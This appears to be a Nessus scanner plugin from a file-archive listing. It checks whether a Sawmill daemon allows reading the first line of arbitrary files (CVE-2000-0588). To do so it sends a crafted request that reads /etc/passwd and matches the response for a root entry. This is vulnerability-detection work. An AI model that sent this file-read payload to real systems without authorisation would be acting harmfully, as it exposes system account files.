home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / sawmill.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  95 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10453);
  10.  script_bugtraq_id(1402);
  11.  script_version ("$Revision: 1.17 $");
  12.  script_cve_id("CVE-2000-0588");
  13.  
  14.  name["english"] = "sawmill allows the reading of the first line of any file";
  15.  name["francais"] = "sawmill allows the reading of the first line of any file";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. The remote sawmill daemon allows the reading of the first
  20. line of arbitrary files on the remote system.
  21.  
  22. Solution : upgrade
  23. Risk factor : Medium";
  24.  
  25.  
  26.  desc["francais"] = "
  27. Le daemon sawmill distant permet la lecture de la
  28. premiere ligne de fichiers arbitraires sur l'hotre
  29. distant.
  30.  
  31. Solution : mettez-le α jour
  32. Facteur de risque : Moyen";
  33.  
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "Checks if sawmill reads any file";
  38.  summary["francais"] = "VΘrifie si sawmill lit n'importe quel fichier";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  47.  family["english"] = "Remote file access";
  48.  family["francais"] = "AccΦs aux fichiers distants";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "http_version.nasl");
  51.  script_require_ports(8987, "Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58. include("http_func.inc");
  59. include("http_keepalive.inc");
  60.  
  61. port = 8987;
  62. if(get_port_state(port))
  63. {
  64.   req  = string("/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3");
  65.   req = http_get(item:req, port:port);
  66.   r = http_keepalive_send_recv(port:port, data:req);
  67.   if( r == NULL ) exit(0);
  68.   
  69.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  70.   {
  71.    set_kb_item(name:"Sawmill/readline", value:TRUE);
  72.    set_kb_item(name:"Sawmill/method", value:"standalone");
  73.    security_warning(port);
  74.   }
  75. }
  76.  
  77.  
  78. port = get_http_port(default:80);
  79.  
  80. if(!get_port_state(port))exit(0);
  81.  
  82. foreach dir (cgi_dirs())
  83. {
  84.   req = string(dir, "/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3");
  85.   req = http_get(item:req, port:port);
  86.   r = http_keepalive_send_recv(port:port, data:req);
  87.   if( r == NULL ) exit(0);
  88.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  89.   {
  90.    set_kb_item(name:"Sawmill/readline", value:TRUE);
  91.    set_kb_item(name:"Sawmill/method", value:"cgi");
  92.    security_warning(port);
  93.   }
  94. }
  95.